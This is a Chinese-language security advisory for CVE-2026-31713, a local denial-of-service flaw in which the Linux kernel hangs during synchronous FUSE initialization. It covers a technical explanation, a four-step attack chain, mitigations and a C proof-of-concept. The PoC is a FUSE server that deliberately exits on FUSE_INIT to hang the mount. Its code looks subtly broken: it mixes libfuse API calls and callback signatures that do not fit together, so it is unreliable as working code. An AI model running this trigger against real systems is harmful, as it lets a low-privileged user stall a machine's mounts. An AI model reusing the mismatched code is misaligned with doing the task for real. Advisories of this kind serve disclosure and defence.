CVE-2026-31713 CVSS 5.5 中危

CVE-2026-31713 Linux内核FUSE同步初始化拒绝服务漏洞

披露日期: 2026-05-01

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31713

漏洞类型

拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核FUSE模块存在拒绝服务漏洞。在使用同步初始化时，若服务器在处理FUSE_INIT期间退出，会导致文件系统创建挂起。原因是挂载线程保持设备fd打开，阻止了中止操作，影响系统可用性。

技术细节

该漏洞源于Linux内核FUSE（用户空间文件系统）在同步初始化流程中的逻辑缺陷。当使用同步初始化时，如果FUSE服务器在处理FUSE_INIT请求的过程中因错误或崩溃而退出，文件系统的创建操作将会无限期挂起。在异步挂载场景中，挂载先于FUSE_INIT处理，不会出现递归系统调用占用文件描述符的问题。然而在同步模式下，挂载线程会保持设备文件描述符的打开状态，这种递归的syscall阻止了必要的abort机制触发，导致系统无法完成清理或响应。攻击者可利用此漏洞，诱导FUSE服务器在初始化阶段发生异常，致使受害系统在执行挂载操作时陷入死锁，造成拒绝服务。

攻击链分析

STEP 1

步骤1：触发挂载

本地用户或进程尝试使用同步模式挂载FUSE文件系统。

STEP 2

步骤2：模拟异常

恶意的FUSE服务器在内核发送FUSE_INIT请求后，在处理过程中主动退出或崩溃。

STEP 3

步骤3：阻塞挂起

内核挂载线程因等待响应而阻塞，同时保持设备文件描述符打开，无法触发中止机制。

STEP 4

步骤4：拒绝服务

文件系统创建流程永久挂起，导致系统资源被占用或相关操作无法完成。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <fuse_lowlevel.h>
#include <stdlib.h>
#include <stdio.h>

// Callback for FUSE_INIT
static void fl_init(void *userdata, struct fuse_conn_info *conn,
                    struct fuse_bufvec *bufv) {
    printf("Server received INIT, simulating crash...\n");
    // Exit immediately during init to trigger the hang on kernel side
    exit(1);
}

int main(int argc, char *argv[]) {
    struct fuse_args args = FUSE_ARGS_INIT(argc, argv);
    struct fuse_session *se;
    struct fuse_cmdline_opts opts;

    if (fuse_parse_cmdline(&args, &opts) != 0) return 1;

    se = fuse_lowlevel_new(&args, &(struct fuse_lowlevel_ops){
        .init = fl_init
    }, sizeof(struct fuse_lowlevel_ops), NULL);

    if (!se) {
        fuse_unmount(opts.mountpoint, NULL);
        return 1;
    }

    // Mount the filesystem (Sync mode)
    if (fuse_mount(se, opts.mountpoint) != 0) {
        return 1;
    }

    // Enter the loop, but will exit immediately in init callback
    fuse_session_loop(se);

    return 0;
}

影响范围

Linux Kernel (参考Git提交0c7fca880a40a209a9c92be14143996d14b93ff6修复前版本)

防御指南

临时缓解措施

限制非特权用户挂载FUSE文件系统的权限；监控并强制终止长时间处于挂起状态的挂载进程；在应用补丁前尽量避免使用同步初始化模式的FUSE挂载。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表